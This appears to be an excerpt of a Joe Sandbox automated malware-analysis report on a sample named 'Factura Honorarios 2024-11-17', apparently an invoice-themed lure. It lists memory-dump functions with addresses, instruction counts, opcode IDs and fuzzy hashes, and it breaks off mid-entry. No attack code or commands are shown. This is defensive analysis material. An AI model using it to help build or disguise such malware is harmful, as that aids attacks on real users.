                                                                                                                                  • Instruction ID: 11616fbe387433836f7e824700995aeebcf8f12d270f411ef12435d1d86b4818
                                                                                                                                  • Opcode Fuzzy Hash: ce0a1a15042c1d8d49556b6e5e2833c060ba1d0936d59db73089d4aad558f6fa
                                                                                                                                  • Instruction Fuzzy Hash: C6E1B074E01218CFEB14CFA9C984B9DBBB2BF89304F2081A9D809B7395DB755A85CF51
                                                                                                                                  Function 39211CF0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f6d939f3b156ebf5a6458e4a1fb416a266cd6221fdf3d17b4a4d045009db907e
                                                                                                                                  • Instruction ID: 74869e8a5bee279534977b7f014e79ebaeac7450012e14cf1c398b0a43f182e4
                                                                                                                                  • Opcode Fuzzy Hash: f6d939f3b156ebf5a6458e4a1fb416a266cd6221fdf3d17b4a4d045009db907e
                                                                                                                                  • Instruction Fuzzy Hash: DCD19F74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB355DB359E82DF50
                                                                                                                                  Function 391E6678 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: eccfc567f499db1f4ed578d19a58a3982f84a6ab9de9b4da5d656062e6357d80
                                                                                                                                  • Instruction ID: a010fc42532557cd38e0178e7cd02d4e7760440bb83943f37986ed2a48e6c1f6
                                                                                                                                  • Opcode Fuzzy Hash: eccfc567f499db1f4ed578d19a58a3982f84a6ab9de9b4da5d656062e6357d80
                                                                                                                                  • Instruction Fuzzy Hash: D7D19E74E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB354DB359E81DF50
                                                                                                                                  Function 391ECAE0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 45330577782be7d946525f25af081eeeb7b866ece97cff643c0f604dc2a2689f
                                                                                                                                  • Instruction ID: ff7e2b10553bf908c0d9a88561d6e3b5c5a86eec3153959e6d9e7b72ae2e501b
                                                                                                                                  • Opcode Fuzzy Hash: 45330577782be7d946525f25af081eeeb7b866ece97cff643c0f604dc2a2689f
                                                                                                                                  • Instruction Fuzzy Hash: CAD18F74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB354DB359E81DF50
                                                                                                                                  Function 39178FB0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ab743ddce13783eadc82ac0a745beb6079bb9c8173e16053a9717a44c8deffbc
                                                                                                                                  • Instruction ID: faa74fbe0da7e1060cb3c53279ecef75defd898f416eda9a486973441c580df7
                                                                                                                                  • Opcode Fuzzy Hash: ab743ddce13783eadc82ac0a745beb6079bb9c8173e16053a9717a44c8deffbc
                                                                                                                                  • Instruction Fuzzy Hash: 9DD18C78E002188FEB54DFA9C990B9DBBB2BF89300F1081A9D909BB355DB315D86DF51
                                                                                                                                  Function 39177720 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e695c55f80bb2f02751fbb209a7558e251b8e9933e4ffe7142fa5a8161d7ecbd
                                                                                                                                  • Instruction ID: b5194f1e91de6f92dbcc645e8bb75670254c55cc05dca3eb0c28ba74976131c3
                                                                                                                                  • Opcode Fuzzy Hash: e695c55f80bb2f02751fbb209a7558e251b8e9933e4ffe7142fa5a8161d7ecbd
                                                                                                                                  • Instruction Fuzzy Hash: 9FC1AE74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF50
                                                                                                                                  Function 38F82968 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3687d89884455d07d548a8851dad8e36eb40988c93e147a6a31ceb8af98a0073
                                                                                                                                  • Instruction ID: e1344ea2dbd62d8e8fbc49650356e858875b19f6b43bc5df402ef15e1fe7e0f4
                                                                                                                                  • Opcode Fuzzy Hash: 3687d89884455d07d548a8851dad8e36eb40988c93e147a6a31ceb8af98a0073
                                                                                                                                  • Instruction Fuzzy Hash: 94C1C174E01218CFDB14DFA9C944B9DBBB2BF89301F1081AAD809A7365DB359E81CF51
                                                                                                                                  Function 38F8E258 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c561be33c3c74cfc734c7b7e14ec81c1596eac0bbe2b0e4ab9f360f314c58d0b
                                                                                                                                  • Instruction ID: cbdd5743eb4a53d93fe1243d12b85c39bb3dd4199d15780b803c219ea40ba591
                                                                                                                                  • Opcode Fuzzy Hash: c561be33c3c74cfc734c7b7e14ec81c1596eac0bbe2b0e4ab9f360f314c58d0b
                                                                                                                                  • Instruction Fuzzy Hash: 8AC1B074E01218CFEB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                                                                                                  Function 391E1BA0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8692f6a3e120d5063f7e0d7529f71d68314826291231dcbfd4faf4cc07f3621e
                                                                                                                                  • Instruction ID: c4161784ef47421068844d4b30aa8f024a2f3f298d754a49f3a9553bbdf43084
                                                                                                                                  • Opcode Fuzzy Hash: 8692f6a3e120d5063f7e0d7529f71d68314826291231dcbfd4faf4cc07f3621e
                                                                                                                                  • Instruction Fuzzy Hash: 7AC1BE74E00218CFEB54DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                                                                                                  Function 39393E60 Relevance: .3, Instructions: 251COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9990c2bc9ac02b687bace4be80f2e33023d4c9a350e565b8bef5d108fceb521e
                                                                                                                                  • Instruction ID: c38b1080a4c02be2b792fb489a983c5413e69e4355ba113c7d8525da95b50792
                                                                                                                                  • Opcode Fuzzy Hash: 9990c2bc9ac02b687bace4be80f2e33023d4c9a350e565b8bef5d108fceb521e
                                                                                                                                  • Instruction Fuzzy Hash: 63918BB595061ACFE714AFA0C95D7EEBBB1FB06302F005429D602772E1DB784A89CF91
                                                                                                                                  Function 39393E70 Relevance: .2, Instructions: 247COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c716e12dcc2d713608f9c4b943fcea9ad8dd9ec514d11725e05d4149a22511dd
                                                                                                                                  • Instruction ID: 7b2ece0db5f1045d009eb14057cbac68c1c5633d02ce49e08a9e735910047fb6
                                                                                                                                  • Opcode Fuzzy Hash: c716e12dcc2d713608f9c4b943fcea9ad8dd9ec514d11725e05d4149a22511dd
                                                                                                                                  • Instruction Fuzzy Hash: 3E917AB595061ACFE714AFA0C95D7EEBBB2FB06702F005429D602772D0DB784A89CF91
                                                                                                                                  Function 38F82DC8 Relevance: .2, Instructions: 220COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f0208e32fb209163d311379b1e763f769f85e72dcc24d49f5104420530892cd3
                                                                                                                                  • Instruction ID: 1f4f2f8d5015d5e2b79037401645ed3bbb14b06263e010ef96ed54b90a03ef0d
                                                                                                                                  • Opcode Fuzzy Hash: f0208e32fb209163d311379b1e763f769f85e72dcc24d49f5104420530892cd3
                                                                                                                                  • Instruction Fuzzy Hash: 70A1E4B4D00208CFEB14DFA9C944B9DBBB1FF89314F208269E409BB2A1DB759985CF55
                                                                                                                                  Function 38F81E80 Relevance: .2, Instructions: 220COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 191decd6c1187740069191f8fe0a0aa4b10f3c8f9e744844df4be42f3e44f867
                                                                                                                                  • Instruction ID: fe03f23100bb986464291ae80ef719c38d896ef56b737f8276463a64e34c569c
                                                                                                                                  • Opcode Fuzzy Hash: 191decd6c1187740069191f8fe0a0aa4b10f3c8f9e744844df4be42f3e44f867
                                                                                                                                  • Instruction Fuzzy Hash: A6A182B5E01218CFEB64CF6AC944B9DFBF2BB89300F14C5AAD408A7254DB349A85CF51
                                                                                                                                  Function 38F817A0 Relevance: .2, Instructions: 219COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 496b98d865464c4dbbaeba5f6a7aae255505b3ac6b7d9d9ca7f76223acd590c1
                                                                                                                                  • Instruction ID: d8e4d81b9d1451dde92d682cf0d7271cbdaef213d28c480723e408545f20c136
                                                                                                                                  • Opcode Fuzzy Hash: 496b98d865464c4dbbaeba5f6a7aae255505b3ac6b7d9d9ca7f76223acd590c1
                                                                                                                                  • Instruction Fuzzy Hash: 34A191B5E01229CFEB64DF6AC944BDDBBF2BB89300F14C1AAD408A7250DB345A85CF51
                                                                                                                                  Function 38F82DC4 Relevance: .2, Instructions: 217COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9ff7d81264db859eae6d1eb42a4e0663bfe916cdcdb8483ecaba5e5b3e3d9213
                                                                                                                                  • Instruction ID: 2a2ccd44511af60221729c75057d9898b311f2ee6efe7050f0d9d53e461ca182
                                                                                                                                  • Opcode Fuzzy Hash: 9ff7d81264db859eae6d1eb42a4e0663bfe916cdcdb8483ecaba5e5b3e3d9213
                                                                                                                                  • Instruction Fuzzy Hash: 37A1D4B4D00208CFEB14DFA9C944B9DBBB1FF89304F208269E409BB2A1DB759985CF55
                                                                                                                                  Function 38F8310E Relevance: .2, Instructions: 202COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ae3e5d671e61bbe6c5a4746437f9fbfb3fd904c62daf1f7c2369a5c580eea47e
                                                                                                                                  • Instruction ID: 4cf730efb80f50398b3f6c4c0a8edd613a1aab9aad75f239e5ee51543531f7e2
                                                                                                                                  • Opcode Fuzzy Hash: ae3e5d671e61bbe6c5a4746437f9fbfb3fd904c62daf1f7c2369a5c580eea47e
                                                                                                                                  • Instruction Fuzzy Hash: 4A91E2B4D00208CFEB10DFA8C984B9DBBB1FF89314F208659E409BB2A1DB759985CF55
                                                                                                                                  Function 3921FB30 Relevance: .2, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 130bf2473f2024c70059e0f261ff6b7c9d89c41f9823e6cbeb0b57e838f36284
                                                                                                                                  • Instruction ID: 3333ed289defc4c09585f94c1baeabab3b1bae77ed0a49fb79320d02811d3006
                                                                                                                                  • Opcode Fuzzy Hash: 130bf2473f2024c70059e0f261ff6b7c9d89c41f9823e6cbeb0b57e838f36284
                                                                                                                                  • Instruction Fuzzy Hash: E581BE74E00218CFEB04DFA9C984A9DBBB2FF88300F608129D815BB355EB359946DF50
                                                                                                                                  Function 39218470 Relevance: .2, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc69d2eafd8897c9a9e9cffa32f250b01c3afca1421569dd4fb4352d4edfbb29
                                                                                                                                  • Instruction ID: 4b18919e57b30a590411f8c3856328182d1d57c97e635f16ba260562bbc603d0
                                                                                                                                  • Opcode Fuzzy Hash: dc69d2eafd8897c9a9e9cffa32f250b01c3afca1421569dd4fb4352d4edfbb29
                                                                                                                                  • Instruction Fuzzy Hash: EE819F78E00218CFEB14DFA9C994B9DBBB2BF88300F608169D815BB354EB359946DF50
                                                                                                                                  Function 39218790 Relevance: .2, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3876630b9521cfe2ae0872a17851dbf16568d7c3f2d29268c2c3524e2bef0ee8
                                                                                                                                  • Instruction ID: ddfa44fd60b2fc3aead5349b37df40917dc26ceec39f8df405d3164d832676f2
                                                                                                                                  • Opcode Fuzzy Hash: 3876630b9521cfe2ae0872a17851dbf16568d7c3f2d29268c2c3524e2bef0ee8
                                                                                                                                  • Instruction Fuzzy Hash: 7E81AE74E00218CFEB14DFA9C994B9DBBB2BF88300F648169D815BB354EB399946DF50
                                                                                                                                  Function 392070C0 Relevance: .2, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5de95b51e32a9e3e620a76d863532ab80e393512eee7b2632236f25854ea4c73
                                                                                                                                  • Instruction ID: fda0dbac069d12e98e2637b5546f0f6797b2c3bb45212b3654f98fb2840a753a
                                                                                                                                  • Opcode Fuzzy Hash: 5de95b51e32a9e3e620a76d863532ab80e393512eee7b2632236f25854ea4c73
                                                                                                                                  • Instruction Fuzzy Hash: 8A81A074E00618CFEB14DFA9C994B9DBBB2BF88300F608169D815BB394EB359946DF50
                                                                                                                                  Function 38F8FC68 Relevance: .2, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a5b55675f2546c5469f11f6096409bfd0797089c47b218c7972737165640c602
                                                                                                                                  • Instruction ID: 95c2a22e2bdb0cd3651d6bf3f18171f995222935641c12a7911fced130672931
                                                                                                                                  • Opcode Fuzzy Hash: a5b55675f2546c5469f11f6096409bfd0797089c47b218c7972737165640c602
                                                                                                                                  • Instruction Fuzzy Hash: 52819E74E00218CFEB14DFA9C894A9DBBB2FF89300F608129D815BB394EB359946DF50
                                                                                                                                  Function 00155362 Relevance: .2, Instructions: 195COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 99c7f5f071e578e272323445d7c8ad1864fe5069793c6a3efd2d8790ad1d81fd
                                                                                                                                  • Instruction ID: 5a41c0463db3ee826735a96ea8cdaa44444e02c4be877ec5ea7ae36bb82fe48f
                                                                                                                                  • Opcode Fuzzy Hash: 99c7f5f071e578e272323445d7c8ad1864fe5069793c6a3efd2d8790ad1d81fd
                                                                                                                                  • Instruction Fuzzy Hash: 3191F774E00618CFDB14CFA9C894A9DBBF2BF89301F158169E819AB365EB349D85CF50
                                                                                                                                  Function 0015C468 Relevance: .2, Instructions: 191COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9582c4328be7d487ec2876251b4f7a17f4c962d8675fa196b490001b3d99bd2f
                                                                                                                                  • Instruction ID: 766815c584cd500b5a0da4c5fb2f0426479e643112c687a0eddf7021dd8d0a35
                                                                                                                                  • Opcode Fuzzy Hash: 9582c4328be7d487ec2876251b4f7a17f4c962d8675fa196b490001b3d99bd2f
                                                                                                                                  • Instruction Fuzzy Hash: 7A81C674E00218CFEB14DFA9C884B9DBBF2BF89305F149169E819AB365DB305945CF51
                                                                                                                                  Function 0015C19B Relevance: .2, Instructions: 188COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 634a3ea08c4efb9c992d5326347a08673f4cbf90f52701b49e5ed4182f1170b0
                                                                                                                                  • Instruction ID: d4ccc9b5e1ab4491246b46d242d7e24120625266a3a4ad8847f8852261fb677b
                                                                                                                                  • Opcode Fuzzy Hash: 634a3ea08c4efb9c992d5326347a08673f4cbf90f52701b49e5ed4182f1170b0
                                                                                                                                  • Instruction Fuzzy Hash: DC81B574E00218CFEB54DFAAD884A9DBBF2BF89301F14C169E819AB365DB309945CF50
                                                                                                                                  Function 0015D278 Relevance: .2, Instructions: 188COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cf311db4ac5c9690afe840fefb81892d98807f81748e81297596618cfcff723d
                                                                                                                                  • Instruction ID: 0acfb1d40e4965139dfe75df59ed3f67f41e36ef7d6f68e86ea112f2b085a97c
                                                                                                                                  • Opcode Fuzzy Hash: cf311db4ac5c9690afe840fefb81892d98807f81748e81297596618cfcff723d
                                                                                                                                  • Instruction Fuzzy Hash: 6181C8B4E00258CFDB14DFAAD884A9DBBF2BF89301F148069E819AB365DB349945CF51
                                                                                                                                  Function 0015CA08 Relevance: .2, Instructions: 187COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c49ebe8c6b405f4c642fa0bf8b94be37e3691824d33d253e50ed6c736089fc34
                                                                                                                                  • Instruction ID: bceac7a6344092e0c1deb9bb299ba878eb968e1e842f9d37893780a12ab2795a
                                                                                                                                  • Opcode Fuzzy Hash: c49ebe8c6b405f4c642fa0bf8b94be37e3691824d33d253e50ed6c736089fc34
                                                                                                                                  • Instruction Fuzzy Hash: D981A574E00218CFEB14DFAAC984A9DBBF2BF89301F14C169E819AB365DB309945CF51
                                                                                                                                  Function 0015CCD8 Relevance: .2, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e8648bfb5e9641ce140cc442f00f7d535edab03ada3effc592ee64de896210a7
                                                                                                                                  • Instruction ID: baee6b8b547e56a953a8c8b89bdbb9a71ae66bfeed10753c9a411cfb887994d5
                                                                                                                                  • Opcode Fuzzy Hash: e8648bfb5e9641ce140cc442f00f7d535edab03ada3effc592ee64de896210a7
                                                                                                                                  • Instruction Fuzzy Hash: 3981B474E00218DFEB14DFAAD884A9DBBF2FF89301F248069E819AB365DB305945CF51
                                                                                                                                  Function 0015C738 Relevance: .2, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0e75ce6d5c9ffe4b25216d77eff7690fc6684fb9139023c59424851cfa4ee1d
                                                                                                                                  • Instruction ID: acd637a0bed8df910ebaac3894dcf94a13301bfa4baedbd2ab97ec3ed29e4351
                                                                                                                                  • Opcode Fuzzy Hash: d0e75ce6d5c9ffe4b25216d77eff7690fc6684fb9139023c59424851cfa4ee1d
                                                                                                                                  • Instruction Fuzzy Hash: 5981C574E00218CFEB14DFAAD984B9DBBF2BF88305F148069E819AB365DB309945CF50
                                                                                                                                  Function 0015CFAC Relevance: .2, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
